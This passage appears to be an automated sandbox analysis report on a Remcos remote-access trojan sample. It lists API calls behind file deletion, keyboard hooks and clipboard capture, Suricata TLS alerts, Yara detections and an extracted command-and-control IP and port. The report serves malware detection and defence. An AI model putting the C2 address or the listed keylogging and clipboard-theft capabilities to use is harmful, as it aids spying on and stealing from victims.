Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	23_2_004089A9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00406AC2 FindFirstFileW,FindNextFileW,	23_2_00406AC2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	23_2_00407A8C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,	23_2_00418C69
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	23_2_00408DA7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AE900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	23_2_00AE900E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AEB59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	23_2_00AEB59C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AFB696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	23_2_00AFB696
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B2D850 FindFirstFileExA,	23_2_00B2D850
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AE7CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	23_2_00AE7CF3
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AE6D29 FindFirstFileW,FindNextFileW,	23_2_00AE6D29
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AF8ED0 FindFirstFileW,	23_2_00AF8ED0
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	24_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	24_2_0041B42F
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	24_2_0040B53A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0044D5E9 FindFirstFileExA,	24_2_0044D5E9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	24_2_004089A9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00406AC2 FindFirstFileW,FindNextFileW,	24_2_00406AC2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	24_2_00407A8C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,	24_2_00418C69
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	24_2_00408DA7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0251900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_0251900E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0252B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	24_2_0252B696
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0251B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	24_2_0251B59C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0255D850 FindFirstFileExA,	24_2_0255D850
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02528ED0 FindFirstFileW,	24_2_02528ED0
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02517CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	24_2_02517CF3
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02516D29 FindFirstFileW,FindNextFileW,	24_2_02516D29
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	35_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	35_2_0041B42F
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	35_2_0040B53A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0044D5E9 FindFirstFileExA,	35_2_0044D5E9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	35_2_004089A9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00406AC2 FindFirstFileW,FindNextFileW,	35_2_00406AC2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	35_2_00407A8C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,	35_2_00418C69
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	35_2_00408DA7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024E900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	35_2_024E900E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024FB696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	35_2_024FB696
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024EB59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	35_2_024EB59C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0252D850 FindFirstFileExA,	35_2_0252D850
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024F8ED0 FindFirstFileW,	35_2_024F8ED0
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024E7CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	35_2_024E7CF3
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024E6D29 FindFirstFileW,FindNextFileW,	35_2_024E6D29

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

0_2_00406F06

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49767 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49819 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49798 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49831 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49850 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49870 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49888 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49905 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49919 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49942 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49964 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49983 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49999 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50016 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50013 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50021 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50024 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50034 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50027 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50031 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50014 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50035 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50038 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50040 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50030 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50022 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50036 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50029 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50026 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50012 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50025 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50039 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50028 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50033 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50019 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50032 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50023 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50020 -> 198.23.227.212:32583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:50037 -> 198.23.227.212:32583

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 198.23.227.212

Source: global traffic

TCP traffic: 192.168.2.7:49767 -> 198.23.227.212:32583

Source: Joe Sandbox View

IP Address: 198.23.227.212 198.23.227.212

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_004260F7 recv,

0_2_004260F7

Source: yavascript.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: 2iH7rqx9rQ.exe, 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, 2iH7rqx9rQ.exe, 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, 2iH7rqx9rQ.exe, 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, yavascript.exe, 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, yavascript.exe, 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, yavascript.exe, 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, yavascript.exe, 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000

0_2_004099E4

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_004159C6

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	0_2_004159C6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	23_2_004159C6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	24_2_004159C6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	35_2_004159C6

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_004159C6

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

0_2_00409B10

Source: Yara match	File source: 23.2.yavascript.exe.ae0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.24e0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.yavascript.exe.2590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.2510e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.2470e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.yavascript.exe.2500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.yavascript.exe.2590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.yavascript.exe.2500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.yavascript.exe.2560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.2iH7rqx9rQ.exe.24f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.yavascript.exe.2560000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.2510e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.ae0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2iH7rqx9rQ.exe PID: 2268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 7796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 7828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 2980, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 23.2.yavascript.exe.ae0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.24e0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.yavascript.exe.2590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.2510e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.2470e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.yavascript.exe.2500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.yavascript.exe.2590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.yavascript.exe.2500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.yavascript.exe.2560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.2iH7rqx9rQ.exe.24f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.yavascript.exe.2560000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.2510e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.ae0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000002.1789796940.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1779058445.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2515411294.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
